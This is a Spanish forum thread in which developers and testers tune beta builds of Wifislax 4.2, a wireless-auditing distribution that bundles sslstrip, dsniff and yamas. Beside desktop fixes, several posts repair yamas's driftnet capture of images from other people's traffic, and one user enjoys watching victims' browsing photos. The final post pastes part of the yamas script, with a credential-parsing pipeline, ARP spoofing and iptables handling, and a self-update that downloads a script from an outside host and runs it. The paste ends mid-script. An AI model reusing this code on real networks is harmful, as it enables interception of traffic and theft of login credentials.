Seguridad Wireless - Wifi
Suite Seguridad Wireless => Colaboracion y desarrollo de nuestras lives => Mensaje iniciado por: USUARIONUEVO en 25-07-2012, 12:40 (Miércoles)
-
lo unico que creo que le falta es el instalador a disco duro.
* changelog wifislax 4.2 con respecto a wifislax-4.1
-añadida libreria libatasmart-20100219-i486-1gsb
-añadida libreria sg3_utils-1.32-i486-1sl
-actualizado kde a version 4.8.4
-actualizado wireshark de 1.6.7 a 1.8.0
-actualizado wifite de beta10 a v2 r85
-añadida libreria libtar-1.2.11-i486-9sl
-añadida libreria libzip-0.9.3-i486-1
-añadida libreria gst-plugins-base-0.10.32-i486-1
-añadida libreria gstreamer-0.10.32-i486-1
-añadida libreria libffi-3.0.11-i486-1
-actualizada suite aircrack-ng a revision r2167
-actualizado firefox 10.0.2 a 14.0.1
-añadido umplayer-20110623-i486-1-BLACK
-añadido yamas yamas-20120213
-añadido sslstrip-0.9
-añadido pyOpenSSL-0.9-i486-3gsb
-añadido dsniff-2.4b1-i486-54.1
-añadido sakis3g-0.2e-wifislax
-añadida libreria db44-4.4.20-i486-2
-añadida libreria Twisted-11.0.0-runtime
-añadida libreria zope.interface-3.3.0-i686-6sl
-añadida suite AircrackGUI-M4-Ultimate-1.0.0-Beta2
-añadida libreria mozilla-nss-3.13.3-i486-1sl
-añadido a firefox plugin youtube downloader
-actualizado nmap de 5.01 a 6.01
-------ELIMINADAS----
-wpa-gui por incompatibilidad con kde4 (no hay kommander )
-removido kommander ( no funciona en kde4 )
----------------------------------------------------------------
-actualizado kernel de 3.3.2 a 3.4.5
-añadido theme de kmd login
-actualizado wireshark de 1.8.0 a 1.8.1
-reconfigurado theme gtk2+
wallpaper [ fondo de pantalla ]
(http://img831.imageshack.us/img831/2680/defaultud.png)
Pantalla de carga de escritorio [ pantalla de justo antes de llegar a escritorio ]
(http://img824.imageshack.us/img824/2974/backgroundndm.jpg)
Pantalla de menu inicial de sistema [ donde elegimos como vamos a arrancar ]
las letras seran de color BLanco , y la barra selectora en vez de roja sera azul ....queda muy bien.
(http://img826.imageshack.us/img826/4144/wifislax.png)
DESCARGA: http://www.downloadwireless.net/isos-fase-testing/wifislax-4.2/wifislax-4.2_32bits-beta3.iso
MD5: 88af99052c79b495244d4ae8fa9521e4
-
Muchas gracias de nuevo por tu trabajo
-
Muy grande tio!! lo descargo y lo pruebo... por cierto el wallpaper alucinante... ya si va tomando esto forma jaja!! que al principio eran un poco sobrios.... ahoa ya coincide mas con nuestro espiritu jajaj!!
Bueno pues encuanto tengas el instalador en hd estara de 10 jajaj!! que y oestoy acostumbrado a instalar siempre en una particion del hd!
Gracias por tu gran trabajo y felicitaciones por tu curro. AHora solo me queda aprender a utilizar yamas.,... que no es poco...
-
¡Que buena pinta!.
He probado la beta 2 y solo me ha permitido arrancar en modo vesa y con los iconos enormes.
Los drivers Nvidia tampoco me han funcionado con esta beta 2.
Peroooo con la beta 3 la cosa ha cambiado y mucho.
Me ha arrancado perfecta en modo auto y me deja cambiar la resolución a mi antojo.
Incluso me detecta la TV conectada por HDMI, captura:
(http://www.subeimagenes.com/img/instantanea2-341608.png)
Solo he visto un par de fallos.
Los caracteres acentuados salen mal y cuando arranca sale un fallo en el KMix, captura:
(http://www.subeimagenes.com/img/instantanea1-341605.png)
Esto está quedando de escandalo.
Un saludo.
-
lo de kmix a mi a veces me sale...se cierra y ya esta.
es por que a veces cuando arranca kmix a lo mejor la tarjeta de sonido aun no ha sido detectada..o si estan los altavoces apagados etc.
lo de los acracteres....me di cuenta --- , he de revisarlo a ver que leches pasa ya hay.
-
revisare el kmix ...ya que pertenece a kde-multimedia , y eso creo que no lo actualice...le hechare un vistazo , por que ademas recuerdo algo en autostart al respecto.
-
los drivers de nvidia , al cambiar kernel..pos , eso.-- ^-^
a ver si juvalmot se anima..aunque creo que esta metido en proyectos personales. ;)
-
disculpen la demora aquí esta el driver nvidia versión 304.22 beta para wifislax 4.2 kernel 3.4.5
http://www.mediafire.com/?qod46295ym6r5e7
tambien Java Version 7 Update 5
http://www.mediafire.com/?7lx12521j4594ki
-
disculpen la demora aquí esta el driver nvidia versión 304.22 beta para wifislax 4.2 kernel 3.4.5
http://www.mediafire.com/?qod46295ym6r5e7
tambien Java Version 7 Update 5
http://www.mediafire.com/?7lx12521j4594ki
muy bien >:(
voy a revisarlo , y subirlo al sitio oficial.
EL DRIVER ESTA PERFECT 10 DE 10 >:(
-
Usuarionuevo.... en otro post no explicaba como se hacia el instalador de hd? podrias intentarlo...
Y sino a esperar a que salgo el padre del programa jjajaj!! Esto ya va tomando forma!!
-
Usuarionuevo.... en otro post no explicaba como se hacia el instalador de hd? podrias intentarlo...
Y sino a esperar a que salgo el padre del programa jjajaj!! Esto ya va tomando forma!!
el instalador que necesito esta programado en qt4 , hay que esperar a que supremo vuelva de sus vacas..o que le de por entrar.
-
una duda que tengo... cuando lo instalo con unetbootin despues tengo que ir a windows para ejecutar el archivo que hay en boot... y que asi se autoarranque... se que se puede hacer desde ubuntu que es con el que me manejo mejor .... pero no se como ejecutar el bath.
-
https://foro.seguridadwireless.net/wifiway/video-de-como-se-hace-un-pendrive-de-wifiway-3-0-booteable/
El tercer video es orientativo de como puedes hacerlo desde un entorno Linux
yo también estoy en el móvil
saludos
-
Gracias... es que era un engorro cada vez que eso... salirme de ubuntu .. entrar en windows hacerlo y volver a reiniciar el portatil.. uff!!
Usuarionuevo: Los actualizadores... nose acabo de verlos y demas.... solo esta el de airoscript muy necesario!! y el de firefox... ninguno mas no?
POr el resto llevo un rato y me encanta!! estoy deseando de que pueda instalarlo.
LOs problemas que tuve fueron con las tildes y el kmix que tambien me salio el mensaje!!
-
hola
el instalador que necesito esta programado en qt4 , hay que esperar a que supremo vuelva de sus vacas..o que le de por entrar.
tus deseos se han cumplido por que supremo12345 esta por aquí jejejej >:( >:( >:( >:( >:( >:(
saludos
-
hola
el instalador que necesito esta programado en qt4 , hay que esperar a que supremo vuelva de sus vacas..o que le de por entrar.
tus deseos se han cumplido por que supremo12345 esta por aquí jejejej >:( >:( >:( >:( >:( >:(
saludos
pues no ha habido suerte , por que no ha debido ver el post de qt4 , le enviare un privado.
-
los caracteres raros...imagino os referiis a multiattack y airoscript.
se encuentran ambos en
/usr/sbin/
podeis abrirlos con kwrite , y al guardarlos de nuevo ( sin tocar nada ) , os fijais en la casilla ..codificacion.....ponerle utf8 , et voila. ^-^
-
los caracteres raros...imagino os referiis a multiattack y airoscript.
se encuentran ambos en
/usr/sbin/
podeis abrirlos con kwrite , y al guardarlos de nuevo ( sin tocar nada ) , os fijais en la casilla ..codificacion.....ponerle utf8 , et voila. ^-^
Eres un crack!! >:(
-
USUARIO, o el resto...
podeis presentar un detalle donde se observe la mala presentacion de los caracteres acentuados?
es posible que NO pase mas que con scripts de terminal? os recuerdo que cosas como el airoscript está en 8859-15, y si habeis pasado a un sistema UTF8, ya tenemos el qué.
el tema de kmix, no deberia pasar salvo que esté tratando de conectar al servidor de sonido de Arts antes de que este esté lanzado. No entiendo mucho de las tecnologías de KDE pero en el desarrollo de backtrack a veces se da el mismo problema.
-
PS: no he dicho nada, hemos llegado todos a la misma conclusion con la codificación de caracteres jajaja
-
Aqui se ven bien ^-^
http://www.wifislax.com/wifislax-4-2-32bits-con-kde-4-8-4-beta-3/
sera porque lo reescribi a pelo jejejeje ^-^
-
PS: no he dicho nada, hemos llegado todos a la misma conclusion con la codificación de caracteres jajaja
exacto , el sistema es utf8 , y los scripts estan en ISO , asi que con abrirlos y guardarlos a utf8 es suficiente.
-
USUARIO, o el resto...
podeis presentar un detalle donde se observe la mala presentacion de los caracteres acentuados?
es posible que NO pase mas que con scripts de terminal? os recuerdo que cosas como el airoscript está en 8859-15, y si habeis pasado a un sistema UTF8, ya tenemos el qué.
el tema de kmix, no deberia pasar salvo que esté tratando de conectar al servidor de sonido de Arts antes de que este esté lanzado. No entiendo mucho de las tecnologías de KDE pero en el desarrollo de backtrack a veces se da el mismo problema.
el tema de kmix es aleatorio , y es como bien dices por que a veces se lanza antes de haber terminado de detectar el hardwrae y cree no haber detectado nada..sin embargo el sonido funciona.
a mi me ha pasado solo 1 o 2 veces, no es nada grave.
-
Aqui se ven bien ^-^
http://www.wifislax.com/wifislax-4-2-32bits-con-kde-4-8-4-beta-3/
sera porque lo reescribi a pelo jejejeje ^-^
claro , ese documento creo esta en uft8 y el foro estara en iso ...ya mirare eso tambien , por que si no el copy&paste queda to guarro.
-
en cualquier, caso, USUARIO, creo (no estoy seguro) que en las propiedades de la sesion de KDE puedes retrasasr el orden de lanzamiento de kmix si ves que da mucho por saco.
cosas como el kmix deberian ser las ultimas en lanzarse. las "race conditions" son un asco...
-
en cualquier, caso, USUARIO, creo (no estoy seguro) que en las propiedades de la sesion de KDE puedes retrasasr el orden de lanzamiento de kmix si ves que da mucho por saco.
cosas como el kmix deberian ser las ultimas en lanzarse. las "race conditions" son un asco...
el kmix se lanza por un servicio de kde ...seria editar el servicio , y antes de llamar a kmix , darle un sleep de 3 segundos.
-
no hay manera de editar el servicio iniciador de kmix, que es cosa de un fichero *desktop
lo que si puedo es , eliminarlo --- y en la carpeta autostart
#!/bin/sh
sleep 3
exec kmix
-
Aqui se ven bien ^-^
http://www.wifislax.com/wifislax-4-2-32bits-con-kde-4-8-4-beta-3/
sera porque lo reescribi a pelo jejejeje ^-^
ya lo he solventado.
windows usa codificacion ISO , Y wifislax esta todo en utf8 ... pero , he configurado kwrite en ISO 8859-15 ET VOILA ,ya van bien las ñ en wifislax y windows sobre el mismo documento. mientras el sistema wifislax sigue usando utf8. ;D
este era uno de esos ajustes chorras que debia hacer.
otro que ya tengo tambien era los iconos de al lado del reloj , que en la version de 64 eran blancos los iconos y quedaban mejor, pues asi los puse en esta beta3 de wifislax 4.2
actualice el multiattack , que para la x64 se hizo multiattack 1.0.7 beta 3 , y en la de 32 bits teniamos el 1.0.7 a secas.
esos son los cambios que llevo de momento ..poca cosa.
aa, y actualizar el gestor de paquetes..con un nuevo ftp hacia slackware 13-37 current..en el que tienen paquetes mas nuevos.
-
muy buenas; hoy me he registrado en este foro aunque llevo tiempo entrando y siguiendo vuestros temas.
hoy he visto este nuevo tema y no me queda mas remedio que registrarme y decirle a USUARIONUEVO de donde saca tanto tiempo y paciencia si a los demás no tenemos tiempo ni de probar las cosa que saca.
un saludo a todos los miembros de esta casa y en especial a USUARIONUEVO, que es el que nos hace ir trasteando sin descanso.
lo dicho, USUARIONUEVO que estamos de vacaciones descansa un poco.
gracias por todo.
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
De esto ya me habia dado cuenta yo hace tiempo, tambien pasa en wifislax-x64
creo que encontre la solución pero se me olvidó publicarla
voy a revisarlo
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
De esto ya me habia dado cuenta yo hace tiempo, tambien pasa en wifislax-x64
creo que encontre la solución pero se me olvidó publicarla
voy a revisarlo
ok , encargate de eso tu.
yo estoy afinando cosillas en kde.
-
USUARIONUEVO
te sugiero:
prueba a modificar el desktop de kmix para que ejecute este comando:
sleep 3; exec kmix
lo que no se es si kde utiliza los mismos fichero desktop para los programas del inicio de sesion que para los programas en general. lo digo porque en caso de que sean compartidos, cada vez que lances el kmix a mano desde el menu, tienes que esperar 3 segundos por narices, cosa que no queda muy bien, y entonces quizas si sea mejor buscar una solución alternativa por scripting para el momento particular del arranque del sistema.
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
De esto ya me habia dado cuenta yo hace tiempo, tambien pasa en wifislax-x64
creo que encontre la solución pero se me olvidó publicarla
voy a revisarlo
ok , encargate de eso tu.
yo estoy afinando cosillas en kde.
Ya lo he mirado, faltaban 2 dependencias del script:
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/tcpxtract_1.0.1-8.xzm
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/driftnet_0.1.6.xzm
Con esto ya captura las imágenes y las muestra en pantalla, pero no las guarda, aunque esto ultimo creo que ya no es un fayo nuestro, si no del mismo script.
-
ok , gracias.
voy a incluirlas.
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
De esto ya me habia dado cuenta yo hace tiempo, tambien pasa en wifislax-x64
creo que encontre la solución pero se me olvidó publicarla
voy a revisarlo
ok , encargate de eso tu.
yo estoy afinando cosillas en kde.
Ya lo he mirado, faltaban 2 dependencias del script:
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/tcpxtract_1.0.1-8.xzm
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/driftnet_0.1.6.xzm
Con esto ya captura las imágenes y las muestra en pantalla, pero no las guarda, aunque esto ultimo creo que ya no es un fayo nuestro, si no del mismo script.
Lo de no guardarlas puede que sea por la ruta!! SI te das cuenta la manda a root/capture....
y esa ruta no existe... es lo primero que pense y es por ello que hice la carpeta por si el problema era ese... despues ya comente aqui... voy a meter los modulos y probar haciendo la carpeta... aunque hasta mañana no podre probarlo ya que no estoy en casa...
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
De esto ya me habia dado cuenta yo hace tiempo, tambien pasa en wifislax-x64
creo que encontre la solución pero se me olvidó publicarla
voy a revisarlo
ok , encargate de eso tu.
yo estoy afinando cosillas en kde.
Ya lo he mirado, faltaban 2 dependencias del script:
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/tcpxtract_1.0.1-8.xzm
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/driftnet_0.1.6.xzm
Con esto ya captura las imágenes y las muestra en pantalla, pero no las guarda, aunque esto ultimo creo que ya no es un fayo nuestro, si no del mismo script.
Lo de no guardarlas puede que sea por la ruta!! SI te das cuenta la manda a root/capture....
y esa ruta no existe... es lo primero que pense y es por ello que hice la carpeta por si el problema era ese... despues ya comente aqui... voy a meter los modulos y probar haciendo la carpeta... aunque hasta mañana no podre probarlo ya que no estoy en casa...
Se supone que el mismo script debería de crear la carpeta con el nombre capture_día_mes_año (osea con la fecha en que se hizo la captura) y meter las imágenes en ella.
Esta es la parte del script donde crea la carpeta:
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir/capture_$(date +%d%m%y) ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir/capture_$(date +%d%m%y) #create if needed
fi
cp /tmp/driftnet* $log_output_dir/capture_$(date +%d%m%y) #copy all content from driftnet's temp folder to destination
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
-
Me gustaría que probarais este modulo, quien pueda y quiera: http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/numlockx-1.2-wifislax.xzm
Lo que hace es arrancar wifislax con el BloqNum activado,
se supone que solo debería activarse en ordenadores de escritorio, ya que en portátiles da problemas con el teclado, para ello, lleva un script (sacado de los repositorios de arch-linux) que detecta si se trata de un portátil o no.
-
Fenomenal.. como vas actualizando al dia... en cuanto tengamso ese instalador se acabaran las betas y por fin la oficail!! y lo podremos instalar en hdd que ya tengo ganas jaja!!
PD: Yamas funciona a la perfeccion.... pero hay una opcion que es para ver als fotos sninfadas o como se diga y no sirve.... no manda las imagenes podeis mirarlo? Se que tenia imagenes porque lo hice con tuenti desde el movil..
De esto ya me habia dado cuenta yo hace tiempo, tambien pasa en wifislax-x64
creo que encontre la solución pero se me olvidó publicarla
voy a revisarlo
ok , encargate de eso tu.
yo estoy afinando cosillas en kde.
Ya lo he mirado, faltaban 2 dependencias del script:
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/tcpxtract_1.0.1-8.xzm
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/driftnet_0.1.6.xzm
Con esto ya captura las imágenes y las muestra en pantalla, pero no las guarda, aunque esto ultimo creo que ya no es un fayo nuestro, si no del mismo script.
Lo de no guardarlas puede que sea por la ruta!! SI te das cuenta la manda a root/capture....
y esa ruta no existe... es lo primero que pense y es por ello que hice la carpeta por si el problema era ese... despues ya comente aqui... voy a meter los modulos y probar haciendo la carpeta... aunque hasta mañana no podre probarlo ya que no estoy en casa...
Se supone que el mismo script debería de crear la carpeta con el nombre capture_día_mes_año (osea con la fecha en que se hizo la captura) y meter las imágenes en ella.
Esta es la parte del script donde crea la carpeta:
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir/capture_$(date +%d%m%y) ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir/capture_$(date +%d%m%y) #create if needed
fi
cp /tmp/driftnet* $log_output_dir/capture_$(date +%d%m%y) #copy all content from driftnet's temp folder to destination
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
Aqui ya me pillas.... yo de porgramacion pues 0 nada de nada!!
Si alguno sabe.... pues que eche un vistazo.... igualmente si se ayuda haceindo la carpeta tal vez... no se ni idea... a ver si mañana consigo sagar algun error o algo en claro..desde la terminal...
-
a mi me guarda las imagenes.
.gif NO
el resto si ...PERO ...HAY QUE CLICKEAR ..DENTRO DE LA PANTALLA DE DRIFNET ....CLICK,,Y GUARDA IMAGEN EN
/root/
deberia guardarlas TODAS AUTOMATICAMENTE , y no depender de si le das click o no en la imagen.
yo he crado la carpeta capture y no van alli las afotos.
el script no crea la carpeta..y el otro utilitario para captura de imagenes, no se lanza..
jajja, como mola ir viiendo las fotos de los sitios visitados. >:D
tengo una beta 4 ....con todo esto ya metido.
-cambiados iconos de notificacion por otros de color blanco
-reconfigurado kwrite [formato de escritura de documentos iso]
-añadido al gestor de paquetes listado actualizado
-reconfigurado el inicio de kmix
-eliminados 2 simbolicos muertos en core [ liffi ]
-eliminados todos los charsets.gz
-solventado problema de caracteres raros en shellç
-añadidas 2 dependencias de yamas para la captura de imagenes
-añadido tcpxtract_1.0.1-8 ( yamas )
-añadido driftnet_0.1.6 ( yamas )
la subire si quereis.. ..como veis la mayoria son ajustes. >:(
gracias demon.
a ver si entre todos hacemos que el yamas funcione al 100x100 , y si me apuras ..por ejemplo tirar con drifnet y remover la otra opcion del menu ,.,..ya que no va, tal vez una ruta mal..o el nombre no coincida y por eso no lo lanze ...
faena para esta noche..revisar yamas...ya que el resto solo es esperar al instalador hd.
-
Me gustaría que probarais este modulo, quien pueda y quiera: http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/numlockx-1.2-wifislax.xzm
Lo que hace es arrancar wifislax con el BloqNum activado,
se supone que solo debería activarse en ordenadores de escritorio, ya que en portátiles da problemas con el teclado, para ello, lleva un script (sacado de los repositorios de arch-linux) que detecta si se trata de un portátil o no.
MIRA , yo te lo puedo probar por que tenia un miniportatil al que le sentaba mal eso..a ver si ahora ya si , por que es un coñazo , lo del numlock.
asias..voy probarlo.
PROBADO
eeepc miniportatil ....el tecaldo queda bien ..nada anormal
asus portatil normal el teclado queda igual , numeros bloqueados (ovbio ya que es un portatil)
sobremesa..TODO OK
, metiendolo en beta 4 >:(
-
Me gustaría que probarais este modulo, quien pueda y quiera: http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/numlockx-1.2-wifislax.xzm
Lo que hace es arrancar wifislax con el BloqNum activado,
se supone que solo debería activarse en ordenadores de escritorio, ya que en portátiles da problemas con el teclado, para ello, lleva un script (sacado de los repositorios de arch-linux) que detecta si se trata de un portátil o no.
MIRA , yo te lo puedo probar por que tenia un miniportatil al que le sentaba mal eso..a ver si ahora ya si , por que es un coñazo , lo del numlock.
asias..voy probarlo.
PROBADO
eeepc miniportatil ....el tecaldo queda bien ..nada anormal
asus portatil normal el teclado queda igual , numeros bloqueados (ovbio ya que es un portatil)
sobremesa..TODO OK
, metiendolo en beta 4 >:(
Perfect ;)
-
YA TENGO CORREGIDO EL YAMAS.
ahora guardara todas las imagenes en
/root/driftnet
para la beta4 estara.
lo malo esque acabo de descubrir que por lo que sea los .gifs . no se pueden ver.
ahora toca mirar que pasa on los gifs....grrrr
-
YA TENGO CORREGIDO EL YAMAS.
ahora guardara todas las imagenes en
/root/driftnet
para la beta4 estara.
lo malo esque acabo de descubrir que por lo que sea los .gifs . no se pueden ver.
ahora toca mirar que pasa on los gifs....grrrr
Jeje yo también estaba con eso, como lo has hecho tu?
Yo le he puesto esta orden:
driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & driftnet -i $iface &> /dev/null &
Así no hace falta tcpxtract para nada, driftnet muestra las imagenes en pantalla y también las guarda en la carpeta con la fecha.
-
YA TENGO CORREGIDO EL YAMAS.
ahora guardara todas las imagenes en
/root/driftnet
para la beta4 estara.
lo malo esque acabo de descubrir que por lo que sea los .gifs . no se pueden ver.
ahora toca mirar que pasa on los gifs....grrrr
Jeje yo también estaba con eso, como lo has hecho tu?
Yo le he puesto esta orden:
driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & driftnet -i $iface &> /dev/null &
Así no hace falta tcpxtract para nada, driftnet muestra las imagenes en pantalla y también las guarda en la carpeta con la fecha.
YO HE SIDO MAS SALVAJE CREO.
quite lo de las fechas...aunque me gustaba la idea.
por que el fallo estaba en que no creaba la carpeta con fechas con lo que no podia mover las imagenes de tmp al directorio de captura.
ademas donde directorio de captura fiajte que pone ~ osea no especifica ruta.
hay una linea que decia
cp /tmp/drftnet* $directorio_de_catura_confecha
pero al no crear la ruta con su fecha ,pos como que no podia guardar nada.
------------
lo de las imagenes gif , eran las qt4 ....ya esta solventado tambien.
------
me gustaria poder dejar la opcion de que cree la carpeta con fechas en driftnet ..asi que estoy abierto a tu idea.
a mi no me crea la carpeta con fecha, de hay que no guardara nada.
-
acabo de caer en algo ...
yo modifique para que no guardara en tmp sino directamente en un directorio que generaba antes en root
si caes en la cuenta..al capturar en tmp y despues copiar en la ruta de captura, estas ocupando el doble de espacio ya que las imagenes se guardan en 2 sitios
tmp + directorio de captura.
la solucion intermedia es la de capturar directamente en
root/driftnet/capturas con fecha en la carpeta.
-
te pego mi codigo ..a ver si llegamos a algo intermedio
[spoiler]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
